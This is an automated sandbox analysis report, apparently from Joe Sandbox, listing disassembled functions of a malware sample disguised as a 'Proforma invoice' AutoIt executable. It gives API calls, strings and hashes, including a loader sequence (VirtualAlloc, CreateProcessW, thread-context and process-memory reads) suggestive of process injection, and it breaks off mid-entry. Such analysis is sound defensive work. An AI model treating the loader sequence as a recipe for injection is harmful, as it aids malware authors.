                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateShow
                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                    • Opcode ID: ec5f932ddc784bffb54df2ffa27b67b4fc278055e55fa15f1a5eba627aa7a981
                                                                                                                    • Instruction ID: a168245b292067db31407b14037ce5843778e3f6dd61c57981f888eb890cd4ce
                                                                                                                    • Opcode Fuzzy Hash: ec5f932ddc784bffb54df2ffa27b67b4fc278055e55fa15f1a5eba627aa7a981
                                                                                                                    • Instruction Fuzzy Hash: 78F03072901290BEEA325713AC0CEA72E7DD7CAF50F00842AB900A2170C1710C12CA74
                                                                                                                    Function 00C52278 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1467 c52278-c523a8 call c4fec8 call c52168 CreateFileW 1474 c523af-c523bf 1467->1474 1475 c523aa 1467->1475 1478 c523c6-c523e0 VirtualAlloc 1474->1478 1479 c523c1 1474->1479 1476 c5245f-c52464 1475->1476 1480 c523e4-c523fb ReadFile 1478->1480 1481 c523e2 1478->1481 1479->1476 1482 c523fd 1480->1482 1483 c523ff-c52439 call c521a8 call c51168 1480->1483 1481->1476 1482->1476 1488 c52455-c5245d ExitProcess 1483->1488 1489 c5243b-c52450 call c521f8 1483->1489 1488->1476 1489->1488
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00C52168: Sleep.KERNELBASE(000001F4), ref: 00C52179
                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00C5239E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013476899.0000000000C4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C4F000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_c4f000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFileSleep
                                                                                                                    • String ID: 54JFAO2AFVHAVQ6
                                                                                                                    • API String ID: 2694422964-3985550941
                                                                                                                    • Opcode ID: 531bf96853bf20093c253a173b7696cc66fd8ccfb50915cb452cfa436705af3e
                                                                                                                    • Instruction ID: 92270c1f23d4ce3c643ba7115418f9bcfa5b81f5492308ddf96afd605b2ccc11
                                                                                                                    • Opcode Fuzzy Hash: 531bf96853bf20093c253a173b7696cc66fd8ccfb50915cb452cfa436705af3e
                                                                                                                    • Instruction Fuzzy Hash: 16519434E04249EBEF11DBA4C855BEEBBB9AF15301F004199E704BB2C1D7790B49CB66
                                                                                                                    Function 0025407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1491 25407c-254092 1492 25416f-254173 1491->1492 1493 254098-2540ad call 257a16 1491->1493 1496 28d3c8-28d3d7 LoadStringW 1493->1496 1497 2540b3-2540d3 call 257bcc 1493->1497 1500 28d3e2-28d3fa call 257b2e call 256fe3 1496->1500 1497->1500 1501 2540d9-2540dd 1497->1501 1510 2540ed-25416a call 272de0 call 25454e call 272dbc Shell_NotifyIconW call 255904 1500->1510 1513 28d400-28d41e call 257cab call 256fe3 call 257cab 1500->1513 1503 254174-25417d call 258047 1501->1503 1504 2540e3-2540e8 call 257b2e 1501->1504 1503->1510 1504->1510 1510->1492 1513->1510
                                                                                                                    APIs
                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0028D3D7
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                    • _memset.LIBCMT ref: 002540FC
                                                                                                                    • _wcscpy.LIBCMT ref: 00254150
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00254160
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                    • String ID: Line:
                                                                                                                    • API String ID: 3942752672-1585850449
                                                                                                                    • Opcode ID: a95ae6c7f1456821bd14435ec1a6706281193bd82d1a0ad495ad30536dbe210d
                                                                                                                    • Instruction ID: d71e7d7071922123dba66009739b986eaf4e78f8e4c7f68d456b7d842892843f
                                                                                                                    • Opcode Fuzzy Hash: a95ae6c7f1456821bd14435ec1a6706281193bd82d1a0ad495ad30536dbe210d
                                                                                                                    • Instruction Fuzzy Hash: 8E31E6720287019BD325EF60EC45FDB77DCAF54305F10491AF985920D1DB7096ADCB8A
                                                                                                                    Function 0025686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00254DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00254E0F
                                                                                                                    • _free.LIBCMT ref: 0028E263
                                                                                                                    • _free.LIBCMT ref: 0028E2AA
                                                                                                                      • Part of subcall function 00256A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00256BAD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                    • API String ID: 2861923089-1757145024
                                                                                                                    • Opcode ID: 9a9345c237eb87c9ef315cdb5dd55b0e47854ce9fa48ad49ffd7113a9a8682e3
                                                                                                                    • Instruction ID: 59d63a66c3f923265a354729697094777cd414d21b8c06ed26f53f8b3dcdecb1
                                                                                                                    • Opcode Fuzzy Hash: 9a9345c237eb87c9ef315cdb5dd55b0e47854ce9fa48ad49ffd7113a9a8682e3
                                                                                                                    • Instruction Fuzzy Hash: 6C919E719212199FCF04EFA4CC919EDB7B8FF09310B04446AF815AB2A1DB70AD69CF54
                                                                                                                    Function 002535B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,002535A1,SwapMouseButtons,00000004,?), ref: 002535D4
                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,002535A1,SwapMouseButtons,00000004,?,?,?,?,00252754), ref: 002535F5
                                                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,002535A1,SwapMouseButtons,00000004,?,?,?,?,00252754), ref: 00253617
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                    • API String ID: 3677997916-824357125
                                                                                                                    • Opcode ID: 20d02c0009e48378c3b0d77738316feddcfc5f0ae7e8a3b24f1677bb022afdd0
                                                                                                                    • Instruction ID: 31cec260d37ed567aef6a01631f15da5a0f4ab2ab1e5251848f3776cd14cb6f2
                                                                                                                    • Opcode Fuzzy Hash: 20d02c0009e48378c3b0d77738316feddcfc5f0ae7e8a3b24f1677bb022afdd0
                                                                                                                    • Instruction Fuzzy Hash: 45115A71921209BFDB20CF64EC44EAEB7BCEF04781F00946AF805D7210D2719F649768
                                                                                                                    Function 00C51168 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00C51923
                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00C519B9
                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00C519DB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013476899.0000000000C4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C4F000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_c4f000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2438371351-0
                                                                                                                    • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                                                                    • Instruction ID: 6064949b0b59360dde01e5fa1e039b57817afe970b38d1ed86e236b11f07014f
                                                                                                                    • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                                                                    • Instruction Fuzzy Hash: 61623A34A14258DBEB24CFA4C844BDEB372EF58301F1091A9D51DEB390E77A9E84CB59
                                                                                                                    Function 002B955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00254EE5: _fseek.LIBCMT ref: 00254EFD
                                                                                                                      • Part of subcall function 002B9734: _wcscmp.LIBCMT ref: 002B9824
                                                                                                                      • Part of subcall function 002B9734: _wcscmp.LIBCMT ref: 002B9837
                                                                                                                    • _free.LIBCMT ref: 002B96A2
                                                                                                                    • _free.LIBCMT ref: 002B96A9
                                                                                                                    • _free.LIBCMT ref: 002B9714
                                                                                                                      • Part of subcall function 00272D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00279A24), ref: 00272D69
                                                                                                                      • Part of subcall function 00272D55: GetLastError.KERNEL32(00000000,?,00279A24), ref: 00272D7B
                                                                                                                    • _free.LIBCMT ref: 002B971C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1552873950-0
                                                                                                                    • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                    • Instruction ID: 054f0e78a23ec8a5fe8dfe8a0e9002e7cdb4f2f3449484dda65fdb6d8432d175
                                                                                                                    • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                    • Instruction Fuzzy Hash: 03514FB1914218ABDF249F64CC85AEEBBB9EF48304F10449EF60DA3241DB715A95CF58
                                                                                                                    Function 0027470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2782032738-0
                                                                                                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                    • Instruction ID: 923f77ffb82aef8f069fa0ab8e4ab8b87688ef1235873bb1ea986acc6401e8f4
                                                                                                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                    • Instruction Fuzzy Hash: 8241D675A2074A9BDB1CEE69CC809AEB7A6EF46364B24C13DE81DCB640D770DD608B41
                                                                                                                    Function 00254C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: AU3!P/.$EA06
                                                                                                                    • API String ID: 4104443479-1743673582
                                                                                                                    • Opcode ID: bfa003ffbb43b192831ba8a9bef19e2919f594f315e18e2a397e28757227b880
                                                                                                                    • Instruction ID: c8be5ee5b80065777e8d951a42874285cd7cb98094ef0326134b333dd9582b1f
                                                                                                                    • Opcode Fuzzy Hash: bfa003ffbb43b192831ba8a9bef19e2919f594f315e18e2a397e28757227b880
                                                                                                                    • Instruction Fuzzy Hash: 65416C31A3515857CF22BF5488527BEFBB19B4530AF284075EC82DB282D6709DFC87A5
                                                                                                                    Function 00257285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0028EA39
                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0028EA83
                                                                                                                      • Part of subcall function 00254750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00254743,?,?,002537AE,?), ref: 00254770
                                                                                                                      • Part of subcall function 00270791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002707B0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                    • String ID: X
                                                                                                                    • API String ID: 3777226403-3081909835
                                                                                                                    • Opcode ID: 2b52382578a5e9033325b859d4c19e50774536a03b10574efe01252599f12cc2
                                                                                                                    • Instruction ID: 811cc952846fcf6004091ba92db741e5fb62727ae162e0169f7f7a56d757d541
                                                                                                                    • Opcode Fuzzy Hash: 2b52382578a5e9033325b859d4c19e50774536a03b10574efe01252599f12cc2
                                                                                                                    • Instruction Fuzzy Hash: C821F634A202489BCF019F94D845BEE7BFCAF48705F00805AE848E7281DBF4599D8F91
                                                                                                                    Function 002B98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 002B98F8
                                                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 002B990F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                    • String ID: aut
                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                    • Opcode ID: 4199358d12c4d75988c243e3632e97c7f19d15cbd72a93ee2e3d20fa9bc2e783
                                                                                                                    • Instruction ID: 0b4aeef3e9fa092b0018848cf7f3a5df1e7efd20dbf3f8661a10b3da940d26ec
                                                                                                                    • Opcode Fuzzy Hash: 4199358d12c4d75988c243e3632e97c7f19d15cbd72a93ee2e3d20fa9bc2e783
                                                                                                                    • Instruction Fuzzy Hash: 7ED05B7594130D6BDB509B90EC0DFD6773CD704700F0042B1BE5591191D97099548B95
                                                                                                                    Function 002CCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c3bafc8feb560d52a3445876f9bd406f00d651ff837b2e2dc124034696f3ba74
                                                                                                                    • Instruction ID: de0c0278519ec08e81b64168abd67ea12670dfc4bbd12993ab4facbc38724517
                                                                                                                    • Opcode Fuzzy Hash: c3bafc8feb560d52a3445876f9bd406f00d651ff837b2e2dc124034696f3ba74
                                                                                                                    • Instruction Fuzzy Hash: 68F14A71A183019FC714DF28C484A6ABBE5FF89314F24892EF8999B351D770E955CF82
                                                                                                                    Function 0025434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00254370
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00254415
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00254432
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_$_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1505330794-0
                                                                                                                    • Opcode ID: 1648b3aa05d9b8fe6075940da31d10653e6244c943ff131883984fc61f29faa5
                                                                                                                    • Instruction ID: ee74fd1d4882ac936ef7d404c39f8b60e9f6492a31c3276b2b4059278c2381c8
                                                                                                                    • Opcode Fuzzy Hash: 1648b3aa05d9b8fe6075940da31d10653e6244c943ff131883984fc61f29faa5
                                                                                                                    • Instruction Fuzzy Hash: D331C371515701DFC721EF24D88469BFBF8FB48309F004D2EEA8A83251D771A998CB56
                                                                                                                    Function 0027571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 00275733
                                                                                                                      • Part of subcall function 0027A16B: __NMSG_WRITE.LIBCMT ref: 0027A192
                                                                                                                      • Part of subcall function 0027A16B: __NMSG_WRITE.LIBCMT ref: 0027A19C
                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 0027573A
                                                                                                                      • Part of subcall function 0027A1C8: GetModuleFileNameW.KERNEL32(00000000,003133BA,00000104,?,00000001,00000000), ref: 0027A25A
                                                                                                                      • Part of subcall function 0027A1C8: ___crtMessageBoxW.LIBCMT ref: 0027A308
                                                                                                                      • Part of subcall function 0027309F: ___crtCorExitProcess.LIBCMT ref: 002730A5
                                                                                                                      • Part of subcall function 0027309F: ExitProcess.KERNEL32 ref: 002730AE
                                                                                                                      • Part of subcall function 00278B28: __getptd_noexit.LIBCMT ref: 00278B28
                                                                                                                    • RtlAllocateHeap.NTDLL(00C10000,00000000,00000001,00000000,?,?,?,00270DD3,?), ref: 0027575F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1372826849-0
                                                                                                                    • Opcode ID: 3b97fcfefa2080c5f60c175d155ba0b6d88745ddba6d738d565783586ddd4bb7
                                                                                                                    • Instruction ID: 462ec996f7d2adf0decc8d246877c1d5346127eb0e326b996b611c8675ec34b1
                                                                                                                    • Opcode Fuzzy Hash: 3b97fcfefa2080c5f60c175d155ba0b6d88745ddba6d738d565783586ddd4bb7
                                                                                                                    • Instruction Fuzzy Hash: DE01F531270B22DEE6197B38EC46A6EF3488B82362F10C425F40DEB181DFF09C209A65
                                                                                                                    Function 002B98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,002B9548,?,?,?,?,?,00000004), ref: 002B98BB
                                                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,002B9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 002B98D1
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,002B9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002B98D8
                                                                                                                    Memory Dump Source
